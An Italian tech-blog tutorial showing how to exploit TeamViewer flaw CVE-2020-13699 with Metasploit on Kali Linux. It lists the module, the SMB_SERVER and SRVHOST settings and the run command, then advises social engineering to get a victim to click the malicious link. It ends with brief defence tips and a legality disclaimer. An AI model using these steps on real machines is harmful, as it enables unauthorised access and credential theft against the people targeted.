Come entrare in un computer sfruttando una falla di TeamViewer
Cari lettori di Tecnogalaxy, oggi parleremo del famoso software TeamViewer, utilizzato come sappiamo per collegarsi da remoto su un qualsiasi device, nella maggior parte dei casi è utilizzato per dare supporto (help desk) dal reparto IT.
Uno dei principali pregi di TeamViewer è la semplicità di utilizzo (quì la nostra guida Come controllare un computer a distanza), è disponibile per i sistemi operativi Windows, macOS, Linux e per tutti i principali smartphone e tablet. Il download è effettuabile gratuitamente dal sito ufficiale.
È stata scoperta una vulnerabilità ad alto rischio in TeamViewer per Windows, viene registrata come “CVE-2020-13699”, con un punteggio base CVSS di “8,8”. Questa vulnerabilità potrebbe essere sfruttato da malintenzionati per violare la password degli utenti con un ulteriore sfruttamento del sistema.
Entrare in un computer a distanza sfruttando la falla di TeamViewer
Nel nostro test andremo a vedere come un malintenzionato sfruttando questa vulnerabilità potrebbe prendere possesso del nostro computer, ovviamente tutto questo con il nostro caro amico Kali Linux.
Iniziamo aprendo una shell e scrivendo il seguente comando:
sudo msfconsole
Adesso dobbiamo cercare la vulnerabilità, scriviamo il comando:
search teamviewer
Utilizziamo il modulo 0
Scriviamo il comando info e confermiamo con l’invio per vedere il contenuto tecnico:
Se scriviamo il comando options potremo vedere tutte le opzioni che servono all’exploit per essere
Andiamo avanti con il nostro test, scriviamo:
set SMB_SERVER 192.168.1.167
set SRVHOST 192.168.1.167
Eseguiamo il nostro exploit:
run
Arrivati a questo punto dobbiamo utilizzare la nostra bravura attivando l’ingegneria sociale, come detto più volte, più saremo bravi e maggiore sarà la percentuale di successo per il nostro test.
Quando il malcapitato cliccherà sul link si aprirà questa finestra:
Come difendersi?
Come consigliato in tutti gli articoli, bisogna sempre tenere aggiornato il proprio sistema operativo, i software che utilizzate, acquistare software sicuri, non aprire link se non siete sicuri al 100%… sul web essere diffidenti :)
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Ecco come vedere gli attacchi hacker in tempo reale
- Ecco cosa è successo alla banca Silvergate
- Waldo: un nuovo motore di ricerca da provare
- La nuova AI di Snapchat basata su ChatGPT
- Quora ha creato il proprio ChatBot
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
